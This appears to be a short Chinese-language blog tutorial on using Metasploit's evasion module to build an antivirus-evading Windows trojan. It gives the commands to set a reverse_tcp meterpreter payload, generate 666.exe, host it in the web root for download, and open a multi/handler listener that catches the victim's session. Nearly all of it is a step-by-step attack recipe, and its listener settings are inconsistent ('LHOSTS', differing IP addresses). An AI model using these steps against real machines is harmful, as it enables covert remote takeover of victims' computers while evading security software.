1.evasion简介
evasion是metasploit自带的模块,使用此模块可以生成反杀毒软件的木马。
2.操作流程
打开kali系统的Metasploit软件。
编辑
如图,我们可以看到evasion中有7个模块
编辑 查看模块 search evasion
编辑
使用模块 use evasion/windows/windows_defender_exe
编辑
查看需要配置的参数 show options
编辑
生成软件 set FILENAME 666.exe
编辑 指定一个payload set payload windows/meterpreter/reverse_tcp
编辑
设置监听主机 set LHOST 192.168.0.109
编辑
run
编辑
将生成的软件复制到/var/www/html/目录下,便于去下载
cp /root/.msf4/local/666.exe /var/www/html/
编辑
在MSF上启动handler开始监听后门程序
1.kali启动Metasploit软件
2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options
3.建立payload set payload windows/meterpreter/reverse_tcp
4.设置监听主机--kali set LHOSTS 192.168.1.109
5.开启run
win7系统下载生成的666.exe文件
编辑
运行软件,我们就成功建立会话成功
编辑
